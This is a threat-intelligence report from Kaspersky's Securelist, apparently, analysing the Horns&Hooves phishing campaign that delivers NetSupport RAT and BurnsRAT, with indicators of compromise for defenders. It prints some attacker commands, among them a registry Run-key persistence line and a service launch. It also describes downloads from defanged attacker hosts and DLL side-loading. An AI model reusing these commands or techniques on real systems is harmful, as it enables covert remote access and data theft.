Maximum Storage Duration: SessionType: HTML Local Storage
yt-remote-cast-installedStores the user's video player preferences using
embedded YouTube video
Maximum Storage Duration: SessionType: HTML Local Storage
yt-remote-connected-devicesStores the user's video player preferences
using embedded YouTube video
Maximum Storage Duration: PersistentType: HTML Local Storage
yt-remote-device-idStores the user's video player preferences using
embedded YouTube video
Maximum Storage Duration: PersistentType: HTML Local Storage
yt-remote-fast-check-periodStores the user's video player preferences
using embedded YouTube video
Maximum Storage Duration: SessionType: HTML Local Storage
yt-remote-session-appStores the user's video player preferences using
embedded YouTube video
Maximum Storage Duration: SessionType: HTML Local Storage
yt-remote-session-nameStores the user's video player preferences using
embedded YouTube video
Maximum Storage Duration: SessionType: HTML Local Storage
* kasperskyform.eu
3
b24-analytics-counter-22-viewPending
Maximum Storage Duration: SessionType: HTML Local Storage
BITRIX_SM_kernelCollects information on user preferences and/or
interaction with web-campaign content - This is used on
CRM-campaign-platform used by website owners for promoting events or
products.
Maximum Storage Duration: 1 dayType: HTTP Cookie
BITRIX_SM_kernel_0Collects information on user preferences and/or
interaction with web-campaign content - This is used on
CRM-campaign-platform used by website owners for promoting events or
products.
Maximum Storage Duration: 1 dayType: HTTP Cookie
* yandex.com
yandex.ru
6
_yasc [x2]Collects data on the user across websites - This data is used to
make advertisement more relevant.
Maximum Storage Duration: 10 yearsType: HTTP Cookie
bh [x2]Collects data on user behaviour and interaction in order to
optimize the website and make advertisement on the website more relevant.
Maximum Storage Duration: 400 daysType: HTTP Cookie
yashr [x2]Pending
Maximum Storage Duration: 1 yearType: HTTP Cookie
* Unclassified 5
Unclassified cookies are cookies that we are in the process of classifying,
together with the providers of individual cookies.
* Meta Platforms, Inc.
1
Learn more about this provider
__test__#Pending
Maximum Storage Duration: SessionType: HTML Local Storage
* Yandex
1
Learn more about this provider
_ymBRCPending
Maximum Storage Duration: PersistentType: HTML Local Storage
* kasperskyform.eu
3
b24-analytics-counter-1126-viewPending
Maximum Storage Duration: SessionType: HTML Local Storage
b24-analytics-counter-1342-viewPending
Maximum Storage Duration: SessionType: HTML Local Storage
qmbPending
Maximum Storage Duration: SessionType: HTTP Cookie
Cross-domain consent2 Your consent applies to the following domains:
List of domains your consent applies to: securelist.lat securelist.com
Cookie declaration last updated on 11/29/24 by Cookiebot
[#IABV2_TITLE#]
[#IABV2_BODY_INTRO#]
[#IABV2_BODY_LEGITIMATE_INTEREST_INTRO#]
[#IABV2_BODY_PREFERENCE_INTRO#]
[#IABV2_LABEL_PURPOSES#]
[#IABV2_BODY_PURPOSES_INTRO#]
[#IABV2_BODY_PURPOSES#]
[#IABV2_LABEL_FEATURES#]
[#IABV2_BODY_FEATURES_INTRO#]
[#IABV2_BODY_FEATURES#]
[#IABV2_LABEL_PARTNERS#]
[#IABV2_BODY_PARTNERS_INTRO#]
[#IABV2_BODY_PARTNERS#]
Cookies are small text files that can be used by websites to make a user's
experience more efficient.
The law states that we can store cookies on your device if they are strictly
necessary for the operation of this site. For all other types of cookies we need
your permission.
This site uses different types of cookies. Some cookies are placed by third
party services that appear on our pages.
You can at any time change or withdraw your consent from the Cookie Declaration
on our website.
Learn more about who we are, how you can contact us and how we process personal
data in our Privacy Policy.
Please state your consent ID and date when you contact us regarding your
consent.
Do not sell or share my personal information
Use necessary cookies only Allow selection Customize
Allow all cookies
Solutions for:
* Home Products
* Small Business 1-50 employees
* Medium Business 51-999 employees
* Enterprise 1000+ employees
by Kaspersky
* CompanyAccount
* Get In Touch
* Dark mode off
* English
* Russian
* Spanish
* Solutions
* * Internet of Things & Embedded Security
Learn More
* Industrial Cybersecurity
Learn More
* Fraud Prevention
Learn More
* KasperskyOS-based solutions
Learn More
* * OTHER SOLUTIONS
* Kaspersky for Security Operations Center
* Kaspersky IoT Infrastructure Security
* Kaspersky Secure Remote Workspace
* Industries
* * National Cybersecurity
Learn More
* Industrial Cybersecurity
Learn More
* Finance Services Cybersecurity
Learn More
* Healthcare Cybersecurity
Learn More
* Transportation Cybersecurity
Learn More
* Retail Cybersecurity
Learn More
* * OTHER INDUSTRIES
* Telecom Cybersecurity
* View all
* Products
* * Kaspersky Next NEW!
Learn More
* KasperskyXDR
Learn More
* KasperskyEndpoint Security for Business
Learn More
* KasperskyEDR Expert
Learn More
* KasperskyEDR Optimum
Learn More
* KasperskyAnti Targeted Attack Platform
Learn More
* KasperskyHybrid Cloud Security
Learn More
* KasperskySD-WAN
Learn More
* KasperskyIndustrial CyberSecurity
Learn More
* KasperskyContainer Security
Learn More
* * OTHER PRODUCTS
* Kaspersky Security for Internet Gateway
* Kaspersky Embedded Systems Security
* Kaspersky IoT Infrastructure Security
* Kaspersky Secure Remote Workspace
* Kaspersky Security for Mail Server
* View All
* Services
* * KasperskyCybersecurity Services
Learn More
* KasperskySecurity Awareness
Learn More
* KasperskyPremium Support
Learn More
* KasperskyThreat Intelligence
Learn More
* KasperskyManaged Detection and Response
Learn More
* KasperskyCompromise Assessment
Learn More
* KasperskySOC Consulting
Learn More
* * OTHER SERVICES
* Kaspersky Professional Services
* Kaspersky Incident Response
* Kaspersky Cybersecurity Training
* View All
* Resource Center
* Case Studies
* White Papers
* Datasheets
* Technologies
* MITRE ATT&CK
* About Us
* Transparency
* Corporate News
* Press Center
* Careers
* Sponsorship
* Policy Blog
* Contacts
* GDPR
* Subscribe Dark mode off Login
* Securelist menu
* English
* Russian
* Spanish
* Existing Customers
* Personal
* My Kaspersky
* Renew your product
* Update your product
* Customer support
* Business
* KSOS portal
* Kaspersky Business Hub
* Technical Support
* Knowledge Base
* Renew License
* Home
* Products
* Trials&Update
* Resource Center
* Business
* Kaspersky Next
* Small Business (1-50 employees)
* Medium Business (51-999 employees)
* Enterprise (1000+ employees)
*
* Securelist
* Threats
* Financial threats
* Mobile threats
* Web threats
* Secure environment (IoT)
* Vulnerabilities and exploits
* Spam and Phishing
* Industrial threats
* Categories
* APT reports
* Incidents
* Research
* Malware reports
* Spam and phishing reports
* Publications
* Kaspersky Security Bulletin
* Archive
* All Tags
* APT Logbook
* Webinars
* Statistics
* Encyclopedia
* Threats descriptions
* KSB 2021
*
* About Us
* Company
* Transparency
* Corporate News
* Press Center
* Careers
* Sponsorships
* Policy Blog
* Contacts
* Partners
* Find a Partner
* Partner Program
Content menu Close
Subscribe
by Kaspersky
Dark mode off
Threats
Threats
* APT (Targeted attacks)
* Secure environment (IoT)
* Mobile threats
* Financial threats
* Spam and phishing
* Industrial threats
* Web threats
* Vulnerabilities and exploits
* All threats
Categories
Categories
* APT reports
* Malware descriptions
* Security Bulletin
* Malware reports
* Spam and phishing reports
* Security technologies
* Research
* Publications
* All categories
Other sections
* Archive
* All tags
* Webinars
* APT Logbook
* Statistics
* Encyclopedia
* Threats descriptions
* KSB 2023
Research
HORNS&HOOVES CAMPAIGN DELIVERS NETSUPPORT RAT AND BURNSRAT
Research
02 Dec 2024
11 minute read
Table of Contents
* Statistics
* Malicious scripts
* Version A (HTA)
* Version B (JS + NSM)
* Version C (JS + BurnsRAT)
* Version D (JS + Hosted NSM ZIP)
* Version E (JS + Embedded NSM ZIP)
* Attribution
* What happens after RMS or NetSupport RAT is installed
* Takeaways
* Indicators of compromise
* Malicious file hashes
Authors
* Artem Ushkov
Recent months have seen a surge in mailings with lookalike email attachments in
the form of a ZIP archive containing JScript scripts. The script files –
disguised as requests and bids from potential customers or partners – bear names
such as “Запрос цены и предложения от Индивидуального предпринимателя <ФИО> на
август 2024. АРТ-КП0005272381.js” (Request for price and proposal from sole
trader <name> for August 2024. ART-KP0005272381.js), “Запрос предложений и цен
от общества с ограниченной ответственностью <предприятие> на сентябрь 2024.
отэк-мн0008522309.js” (Request for proposals and prices from LLC <company> for
September 2024. Otek-mn0008522309.js), and the like.
Examples of malicious emails
According to our telemetry, the campaign began around March 2023 and hit more
than a thousand private users, retailers and service businesses located
primarily in Russia. We dubbed this campaign Horns&Hooves, after a fictitious
organization set up by swindlers in the Soviet comedy novel The Golden Calf.
STATISTICS
Number of users who encountered the malicious script, by month, March 2023 —
September 2024 (download)
MALICIOUS SCRIPTS
During the campaign, the threat actors made some major changes to the script,
while keeping the same distribution method. In almost all cases, a JS script
named “Заявка на закупку…” (“Purchase request…”), “Запрос цен…” (“Request for
quote…”), or similar was sent in a ZIP archive. Far more rarely, the scripts
were called “Акт сверки…” (“Reconciliation statement…”), “Заявление на возврат…”
(“Request for refund…”), “Досудебная претензия…” (“Letter of claim…”) or just
“Претензия…” (“Claim…”). The earliest versions that we encountered in April and
May used scripts with the HTA extension instead of JS scripts.
For believability, besides the script, the attackers sometimes added to the
archive various documents related to the organization or individual being
impersonated. For example, an archive attached to a booking cancellation email
contained a PDF file with a copy of a passport; while price request emails had
extracts from the Russian Unified State Register of Legal Entities, certificates
of tax registration and company cards in attachment. Below, we examine several
versions of the scripts used in this campaign.
Typical archive contents
VERSION A (HTA)
Some of the first sample scripts we saw in April and early May 2023 were
relatively small in size. As an example, we analyzed a sample with the MD5 hash
sum 327a1f32572b4606ae19085769042e51.
First version of the malicious script in attachment
When run, the script downloads a decoy document from
https://www.linkpicture[.]com/q/1_1657.png in the form of a PNG image, which it
then shows to the user. In this case, the image looks like a screenshot of a
table listing items for purchase. It may have been taken from a previously
infected machine.
Decoy document in PNG format
Note that PNG decoy documents are rather unconventional. Usually, bids and
requests that are used to distract user attention from malware are distributed
in office formats such as DOCX, XSLX, PDF and others. The most likely reason for
using PNG is that in the very first versions the attackers hid the payload at
the end of the bait file. PNG images make convenient containers because they
continue to display correctly even after the payload is added.
To download the decoy document, the attackers use the curl utility, which comes
preinstalled on devices with Windows 10 (build 17063 and higher). Together with
the document, using another built-in Windows utility, bitsadmin, the script
downloads and runs the BAT file bat_install.bat to install the main payload. The
script also makes use of bitsadmin for managing file transfer tasks.
Snippet of the BAT script that installs the payload
Using bitsadmin, the BAT script first downloads from the attackers’ address
hxxps://golden-scalen[.]com/files/, and then installs, the following files:
File name Description AudioCapture.dll NetSupport Audio Capture client32.exe
NetSupport client named CrossTec client32.ini Configuration file HTCTL32.DLL
NetSupport utility for HTTP data transfer msvcr100.dll Microsoft C runtime
library nskbfltr.inf Windows Driver Frameworks configuration file for installing
additional drivers NSM.LIC NetSupport license file nsm_vpro.ini Additional NSM
settings pcicapi.dll pcicapi file from the NetSupport Manager package
PCICHEK.DLL CrossTec VueAlert PCIChek PCICL32.DLL NetSupport client as a DLL
remcmdstub.exe CrossTec remote command line TCCTL32.DLL NetSupport utility for
TCP data transfer
To download the required file, bat_install.bat appends its name to the end of
the URL. The script saves the downloaded files to the user directory
%APPDATA%\VCRuntineSync.
The payload is the legitimate NetSupport Manager (NSM) tool for remote PC
management. This software is often used in corporate environments for technical
support, employee training and workstation management. However, due to its
capabilities, it is regularly exploited by all kinds of cybergangs. The versions
and modifications of this software seen in cyberattacks and providing a stealth
run mode have been dubbed NetSupport RAT.
Most often, NetSupport RAT infiltrates the system through scam websites and fake
browser updates. In December 2023, we posted a report on one such campaign that
installed NetSupport RAT under the guise of a browser update after the user
visited a compromised website.
After the file download, the bat_install.bat script runs the client32.exe file
and adds it to the startup list.
start /B cmd /C "start client32.exe & exit" reg add
"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "VCRuntineSync" /t
REG_SZ /d '%APPDATA%\VCRuntineSync\client32.exe' /f
1
2
3
start /B cmd /C "start client32.exe & exit"
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v
"VCRuntineSync" /t REG_SZ /d '%APPDATA%\VCRuntineSync\client32.exe' /f
And, in case the HTA script failed, the BAT script attempts to download and run
the bait file.
When NetSupport RAT is run, it establishes a connection to one of the attackers’
servers set in the client32.ini configuration file: the main one,
xoomep1[.]com:1935, or the backup one, xoomep2[.]com:1935.
The client32.ini configuration file
Version A infection chain
VERSION B (JS + NSM)
A bit later, in mid-May 2023, there appeared versions of the script mimicking
legitimate JS files.
JS version of the malicious script in attachment
The code of this script contains a comment from the publicly available
JavaScript library Next.js with license and copyright information. This way, the
attackers try to make the code appear legitimate. We also see how they added
malicious code to the middle of the file that a cursory inspection would miss,
but still got executed at runtime.
In terms of functionality, the JS versions of the script are virtually the same
as the HTA ones. They too show a decoy document and install NetSupport RAT. But
there are some differences. For example, the script with the hash sum
b3bde532cfbb95c567c069ca5f90652c, which we found under the filename ” досудебная
претензия от 18.05.2023 №5 от компании ооо <НАЗВАНИЕ_КОМПАНИИ>.js ” (“Letter of
claim No. 5, dated May 18, 2023, from LLC <company>.js”), first downloads an
intermediate JS script from the address
hxxp://188[.]227[.]58[.]243/pretencia/www.php.
Second script contents
This second script downloads two more files: the decoy document zayavka.txt and
the NetSupport RAT installer installer_bat_vbs.bat. Like PNG images, decoy
documents in TXT format are not standard practice. And with this version, the
files contain generated text in Russian that is meaningless and repeated several
times, using different characters that look vaguely Cyrillic. They would appear
to be the first tests of the new bait file format.
Decoy document with meaningless text
After downloading the files, the www.php script opens the text document and runs
the NetSupport RAT installer, which it saves with the name BLD.bat. To download
the NetSupport components, the script uses the same path as version A:
hxxps://golden-scalen[.]com/files/. Unlike the previous version, this script
downloads the files to the %APPDATA%\EdgeCriticalUpdateService directory.
Correspondingly, the autorun registry key used by this version is named
EdgeCriticalUpdateService. Also, the BLD.bat file contains no redundant code for
re-downloading the bait file.
Version B infection chain
VERSION C (JS + BURNSRAT)
Another interesting sample we found in mid-May had the name ” заявка на закупки
№113 от компании <НАЗВАНИЕ_КОМПАНИИ> на май 2023 года.js ” (“procurement request
No. 113 from <company> for May 2023.js”) and the MD5 hash sum
5f4284115ab9641f1532bb64b650aad6.
Fully obfuscated version of the malicious script
Here, we also see a comment with license and copyright information about the
Next.js library, but there is nothing left of the library source code. The
malicious code itself is more heavily obfuscated, and the link to the
intermediate script hxxp://188[.]227[.]106[.]124/test/js/www.php is invisible to
the naked eye.
Second script contents
In this version, the intermediate script downloads three more files: the decoy
document zayavka.txt, the payload BLD.exe, and the auxiliary script 1.js. The
decoy document in this instance looks more meaningful, and is likely the result
of a screenshot-to-text conversion.
Decoy document
Having loaded the files, the www.php script opens the decoy document and runs
the 1.js file, which in turn launches the BLD.exe file.
What’s most striking about this instance is the payload.
BLD.exe (MD5: 20014b80a139ed256621b9c0ac4d7076) is an NSIS installer that
creates a Silverlight.7z archive in the %PROGRAMDATA%\Usoris\LastVersion folder
and extracts several files from it:
File name Description libeay32.dll OpenSSL shared library msimg32.dll Malicious
loader settings.dat RMS configuration file Silverlight.Configuration.exe
Legitimate Microsoft Silverlight Configuration Utility ssleay32.dll OpenSSL
shared library w32.dat Archive with RDP Wrapper x32 w64.dat Archive with RDP
Wrapper x64 WUDFHost.exe Remote Manipulator System
The next step is to run the legitimate Silverlight.Configuration.exe file. When
launched, it loads the dynamic libraries (DLLs) that the program needs, using a
relative path. This opens the door to a DLL side-loading attack: the malicious
msimg32.dll library and the utility are placed in the same directory, which
results in the malicious program being loaded and gaining control instead of the
system library. Although the backdoor supports commands for remotely downloading
and running files, as well as various methods of executing commands via the
Windows command line, the main task of this component is to start the Remote
Manipulator System (RMS) as a service and send the RMS session ID to the
attackers’ server.
svchost.exe -k "WUDFHostController" -svcr "WUDFHost.exe"
1
svchost.exe -k "WUDFHostController" -svcr "WUDFHost.exe"
On top of that, msimg32.dll sends information about the computer to the server
hxxp://193[.]42[.]32[.]138/api/.
Outgoing request to the server
The sent data is encrypted using the RC4 algorithm with the Host value as the
key, which in this case is the IP address of the server, 193.42.32[.]138.
System information sent by the library
RMS is an application that allows users to interact with remote systems over a
network. It provides the ability to manage the desktop, execute commands,
transfer files and exchange data between devices located in different geographic
locations. Typically, RMS uses encryption technologies to protect data and can
run on a variety of operating systems. The RMS build distributed by the
attackers is also called BurnsRAT.
RMS has support for connecting to a remote computer via Remote Desktop Protocol
(RDP), so besides the application itself and files for running it, the NSIS
installer saves to the device the w32.dat and w64.dat archives, which contain a
set of libraries created using RDP Wrapper to activate additional RDP features.
RDP Wrapper is a program for activating remote desktop features in Windows
versions that do not support them by default, such as Windows Home; it also
allows multiple users to connect to one system simultaneously.
At its core, RMS is a close analog of NetSupport, but the RMS payload did not
gain traction.
BurnsRAT infection chain
VERSION D (JS + HOSTED NSM ZIP)
A few more characteristic changes in the scripts caught our eye in late May
2023. Let’s examine them using a file named “purchase request from LLC <company>
No. 3.js” with hash sum 63647520b36144e31fb8ad7dd10e3d21 as an example. The
initial script itself is very similar to version B and differs only in the link
to the second script, hxxp://45[.]133[.]16[.]135/zayavka/www.php. But unlike
version B, the BAT file for installing NetSupport RAT has been completely
rewritten.
BAT script contents
In this version, it is located at hxxp://45[.]133[.]16[.]135/zayavka/666.bat,
and to install NetSupport it downloads an intermediate PowerShell script
hxxp://45[.]133[.]16[.]135/zayavka/1.yay, which in turn downloads and unpacks
the NetSupport RAT archive from hxxp://golden-scalen[.]com/ngg_cl.zip. The
contents of the archive are identical in every way to the NetSupport version
installed by the version B script.
PowerShell script contents
Version D infection chain
VERSION E (JS + EMBEDDED NSM ZIP)
The next notable, but less fundamental changes appeared in June 2023. Instead of
downloading the encoded ZIP archive with NetSupport RAT, the attackers began
placing it inside the script. This caused the script to increase in size. In
addition, the comment in the file header was replaced with one from the
Backbone.js library.
Snippet of the third version of the script
Starting around September 2023, the NetSupport RAT files were split into two
archives; and since February 2024, instead of text bait files, the attackers
have been striving for greater plausibility by using PDF documents which were
also contained in the script code.
Version E decoy document
Version E infection chain
ATTRIBUTION
All NetSupport RAT builds detected in the campaign contained one of three
license files with the following parameters:
File 1 licensee=HANEYMANEY
serial_no=NSM385736 File 2 licensee=DCVTTTUUEEW23
serial_no=NSM896597 File 3 licensee=DERTERT
serial_no=NSM386098
License files
These license files were also used in various other unrelated campaigns. For
instance, they’ve been seen in mailings targeting users from other countries,
such as Germany. And they’ve cropped up in NetSupport RAT builds linked to the
TA569 group (also known as Mustard Tempest or Gold Prelude). Note that licenses
belonging to HANEYMANEY and DCVTTTUUEEW23 featured in the Horns&Hooves campaign
for a short span before being completely dislodged by a license issued in the
name of DERTERT three months later.
HANEYMANEY DCVTTTUUEEW23 DERTERT Date of creation in the comment in the file
2022.07.17 2014.03.29 2017.07.26 Date from the file attributes in the archive
2022.07.17 2023.03.29 2022.07.26 Observed as part of the campaign 2023.04.17
2023.05.28 2023.07.09
The fact that Horns&Hooves uses the same licenses as TA569 led us to suspect a
possible connection between the two. That said, because license files alone are
insufficient to attribute malicious activity to TA569, we decided to look for
other similarities. And so we compared the various configuration files that
featured in the Horns&Hooves campaign and those used by TA569 – and found them
to be near identical. As an example, let’s consider the Horns&Hooves
configuration file (edfb8d26fa34436f2e92d5be1cb5901b) and the known
configuration file of the TA569 group (67677c815070ca2e3ebd57a6adb58d2e).
Comparing the Horns&Hooves and TA569 configuration files
As we can see, everything matches except the domains and ports. The Gateway
Security Key (GSK) field warrants special attention. The fact that the values
match indicates that the attackers use the same security key to access the
NetSupport client. And this means that the C2 operators in both cases most
likely belong to TA569.
We checked if the key GSK=GF<MABEF9G?ABBEDHG:H had been seen in other campaigns
that could not be attributed to either Horns&Hooves or TA569, and found none.
Besides this key, we encountered another value in the Horns&Hooves campaign,
GSK=FM:N?JDC9A=DAEFG9H<L>M; and in later versions there appeared one more
version of the key, which was set with the parameter
SecurityKey2=dgAAAI4dtZzXVyBIGlsJn859nBYA.
WHAT HAPPENS AFTER RMS OR NETSUPPORT RAT IS INSTALLED
The installation of BurnsRAT or NetSupport RAT is only an intermediate link in
the attack chain, giving remote access to the computer. In a number of cases, we
observed attempts to use NetSupport RAT to install stealers such as Rhadamanthys
and Meduza. However, TA569 generally sells access to infected computers to other
groups, for example, to install ransomware Trojans.
But it’s possible that the attackers may collect various documents and email
addresses to further develop the campaign, since the earliest scripts
distributed Rhadamanthys instead of NetSupport RAT.
TAKEAWAYS
This post has looked in detail at several ways of delivering and using
legitimate software for malicious purposes as part of a sustained campaign. Over
the course of the campaign, the attackers changed some of their tactics and
experimented with new tools. For instance, they gradually moved away from using
additional servers to deliver the payload, leaving only two as a result, which
the remote administration software itself uses. Also, the attackers initially
weaponized BurnsRAT, but then abandoned it and placed all the program code for
installing and running NetSupport RAT in a single script. They probably found
this approach more efficient in terms of both development and difficulty of
detection.
We were able to determine with a high degree of certainty that the campaign is
linked to the TA569 group, which gains access to organizations and then sells it
to other cybercriminals on the dark web. Depending on whose hands this access
falls into, the consequences for victim companies can range from data theft to
encryption and damage to systems. We also observed attempts to install stealers
on some infected machines.
INDICATORS OF COMPROMISE
MALICIOUS FILE HASHES
Version A
327a1f32572b4606ae19085769042e51 — HTA
34eb579dc89e1dc0507ad646a8dce8be — bat_install.bat
Version B
b3bde532cfbb95c567c069ca5f90652c — JS
29362dcdb6c57dde0c112e25c9706dcf — www.php
882f2de65605dd90ee17fb65a01fe2c7 — installet_bat_vbs.bat
Version C
5f4284115ab9641f1532bb64b650aad6 — JS
0fea857a35b972899e8f1f60ee58e450 — www.php
20014b80a139ed256621b9c0ac4d7076 — BLD.exe
7f0ee078c8902f12d6d9e300dabf6aed — 1.js
Version D
63647520b36144e31fb8ad7dd10e3d21 — JS
8096e00aa7877b863ef5a437f55c8277 — www.php
12ab1bc0989b32c55743df9b8c46af5a — 666.bat
50dc5faa02227c0aefa8b54c8e5b2b0d — 1.yay
e760a5ce807c756451072376f88760d7 — ngg_cl.zip
Version E
b03c67239e1e774077995bac331a8950 — 2023.07
ba69cc9f087411995c64ca0d96da7b69 — 2023.09
051552b4da740a3af5bd5643b1dc239a — 2024.02
BurnsRAT C&C
hxxp://193[.]42[.]32[.]138/api/
hxxp://87[.]251[.]67[.]51/api/
Links, version A
hxxp://31[.]44[.]4[.]40/test/bat_install.bat
hxxps://golden-scalen[.]com/files/*
Links, version B
hxxp://188[.]227[.]58[.]243/pretencia/www.php
hxxp://188[.]227[.]58[.]243/zayavka/www.php
hxxp://188[.]227[.]58[.]243/pretencia/installet_bat_vbs.bat
hxxps://golden-scalen[.]com/files/*
Links, version C
hxxp://188[.]227[.]106[.]124/test/js/www.php
hxxp://188[.]227[.]106[.]124/test/js/BLD.exe
hxxp://188[.]227[.]106[.]124/test/js/1.js
Links, version D
hxxp://45[.]133[.]16[.]135/zayavka/www.php
hxxp://45[.]133[.]16[.]135/zayavka/666.bat
hxxp://45[.]133[.]16[.]135/zayavka/1.yay
hxxp://golden-scalen[.]com/ngg_cl.zip
Client32.ini for Horns&Hooves
edfb8d26fa34436f2e92d5be1cb5901b
3e86f6fc7ed037f3c9560cc59aa7aacc
ae4d6812f5638d95a82b3fa3d4f92861
Client32.ini known to belong to TA569
67677c815070ca2e3ebd57a6adb58d2e
Nsm.lic
17a78f50e32679f228c43823faabedfd — DERTERT
b9956282a0fed076ed083892e498ac69 — DCVTTTUUEEW23
1b41e64c60ca9dfadeb063cd822ab089 — HANEYMANEY
NetSupport RAT C2 centers for Horns&Hooves
xoomep1[.]com
xoomep2[.]com
labudanka1[.]com
labudanka2[.]com
gribidi1[.]com
gribidi2[.]com
C2 centers known to be linked to TA569
shetrn1[.]com
shetrn2[.]com
* BurnsRAT
* JavaScript
* Malware
* Malware Descriptions
* Malware Statistics
* Malware Technologies
* NetSupport RAT
* Phishing
* RAT Trojan
Authors
* Artem Ushkov
Horns&Hooves campaign delivers NetSupport RAT and BurnsRAT
Your email address will not be published. Required fields are marked *
Name *
Email *
Cancel
Δ
Table of Contents
* Statistics
* Malicious scripts
* Version A (HTA)
* Version B (JS + NSM)
* Version C (JS + BurnsRAT)
* Version D (JS + Hosted NSM ZIP)
* Version E (JS + Embedded NSM ZIP)
* Attribution
* What happens after RMS or NetSupport RAT is installed
* Takeaways
* Indicators of compromise
* Malicious file hashes
GReAT webinars
13 May 2021, 1:00pm
GREAT IDEAS. BALALAIKA EDITION
* Boris Larin
* Denis Legezo
26 Feb 2021, 12:00pm
GREAT IDEAS. GREEN TEA EDITION
* John Hultquist
* Brian Bartholomew
* Suguru Ishimaru
* Vitaly Kamluk
* Seongsu Park
* Yusuke Niwa
* Motohiko Sato
17 Jun 2020, 1:00pm
GREAT IDEAS. POWERED BY SAS: MALWARE ATTRIBUTION AND NEXT-GEN IOT HONEYPOTS
* Marco Preuss
* Denis Legezo
* Costin Raiu
* Kurt Baumgartner
* Dan Demeter
* Yaroslav Shmelev
26 Aug 2020, 2:00pm
GREAT IDEAS. POWERED BY SAS: THREAT ACTORS ADVANCE ON NEW FRONTS
* Ivan Kwiatkowski
* Maher Yamout
* Noushin Shabab
* Pierre Delcher
* Félix Aime
* Giampaolo Dedola
* Santiago Pontiroli
22 Jul 2020, 2:00pm
GREAT IDEAS. POWERED BY SAS: THREAT HUNTING AND NEW TECHNIQUES
* Dmitry Bestuzhev
* Costin Raiu
* Pierre Delcher
* Brian Bartholomew
* Boris Larin
* Ariel Jungheit
* Fabio Assolini
From the same authors
LOKI: A NEW PRIVATE AGENT FOR THE POPULAR MYTHIC FRAMEWORK
SUBSCRIBE TO OUR WEEKLY E-MAILS
The hottest research right in your inbox
Email(Required)
(Required)
I agree to provide my email address to “AO Kaspersky Lab” to receive information
about new posts on the site. I understand that I can withdraw this consent at
any time via e-mail by clicking the “unsubscribe” link that I find at the bottom
of any e-mail sent to me for the purposes mentioned above.
Subscribe
Δ
In the same category
THREATS IN SPACE (OR RATHER, ON EARTH): INTERNET-EXPOSED GNSS RECEIVERS
LOOSE-LIPPED NEURAL NETWORKS AND LAZY SCAMMERS
WEB TRACKING REPORT: WHO MONITORED USERS’ ONLINE ACTIVITIES IN 2023–2024 THE
MOST
INDIRECT PROMPT INJECTION IN THE REAL WORLD: HOW PEOPLE MANIPULATE NEURAL
NETWORKS
CYBERSECURITY IN THE SMB SPACE — A GROWING THREAT
LATEST POSTS
Research
HORNS&HOOVES CAMPAIGN DELIVERS NETSUPPORT RAT AND BURNSRAT
* Artem Ushkov
APT reports
APT TRENDS REPORT Q3 2024
* GReAT
Kaspersky Security Bulletin
CONSUMER AND PRIVACY PREDICTIONS FOR 2025
* Anna Larkina
* Vladislav Tushkanov
* Roman Dedenok
* Dmitry Anikin
* Dmitry Momotov
Malware descriptions
ANALYSIS OF ELPACO: A MIMIC VARIANT
* Cristian Souza
* Timofey Ezhov
* Eduardo Ovalle
* Ashley Muñoz
LATEST WEBINARS
Threat intelligence and IR
04 Sep 2024, 5:00pm 60 min
INSIDE THE DARK WEB: EXPLORING THE HUMAN SIDE OF CYBERCRIMINALS
* Anna Pavlovskaya
Technologies and services
13 Aug 2024, 5:00pm 60 min
THE CYBERSECURITY BUYER’S DILEMMA: HYPE VS (TRUE) EXPERTISE
* Oleg Gorobets
* Alexander Liskin
Cyberthreat talks
16 Jul 2024, 5:00pm 60 min
CYBERSECURITY’S HUMAN FACTOR – MORE THAN AN UNPATCHED VULNERABILITY
* Oleg Gorobets
Trainings and workshops
09 Jul 2024, 4:00pm 60 min
BUILDING AND PRIORITIZING DETECTION ENGINEERING BACKLOGS WITH MITRE ATT&CK
* Andrey Tamoykin
REPORTS
APT TRENDS REPORT Q3 2024
The report features the most significant developments relating to APT groups in
Q3 2024, including hacktivist activity, new APT tools and campaigns.
BEYOND THE SURFACE: THE EVOLUTION AND EXPANSION OF THE SIDEWINDER APT GROUP
Kaspersky analyzes SideWinder APT’s recent activity: new targets in the
MiddleEast and Africa, post-exploitation tools and techniques.
BLINDEAGLE FLYING HIGH IN LATIN AMERICA
Kaspersky shares insights into the activity and TTPs of the BlindEagle APT,
which targets organizations and individuals in Colombia, Ecuador, Chile, Panama
and other Latin American countries.
EASTWIND CAMPAIGN: NEW CLOUDSORCERER ATTACKS ON GOVERNMENT ORGANIZATIONS IN
RUSSIA
Kaspersky has identified a new EastWind campaign targeting Russian organizations
and using CloudSorcerer as well as APT31 and APT27 tools.
SUBSCRIBE TO OUR WEEKLY E-MAILS
The hottest research right in your inbox
Email(Required)
(Required)
I agree to provide my email address to “AO Kaspersky Lab” to receive information
about new posts on the site. I understand that I can withdraw this consent at
any time via e-mail by clicking the “unsubscribe” link that I find at the bottom
of any e-mail sent to me for the purposes mentioned above.
Subscribe
Δ
Threats
Threats
* APT (Targeted attacks)
* Secure environment (IoT)
* Mobile threats
* Financial threats
* Spam and phishing
* Industrial threats
* Web threats
* Vulnerabilities and exploits
* All threats
Categories
Categories
* APT reports
* Malware descriptions
* Security Bulletin
* Malware reports
* Spam and phishing reports
* Security technologies
* Research
* Publications
* All categories
Other sections
* Archive
* All tags
* Webinars
* APT Logbook
* Statistics
* Encyclopedia
* Threats descriptions
* KSB 2023
© 2024 AO Kaspersky Lab. All Rights Reserved.
Registered trademarks and service marks are the property of their respective
owners.
* Privacy Policy
* License Agreement
* Cookies
SUBSCRIBE TO OUR WEEKLY E-MAILS
The hottest research right in your inbox
Email(Required)
(Required)
I agree to provide my email address to “AO Kaspersky Lab” to receive information
about new posts on the site. I understand that I can withdraw this consent at
any time via e-mail by clicking the “unsubscribe” link that I find at the bottom
of any e-mail sent to me for the purposes mentioned above.
Subscribe
Δ
Notifications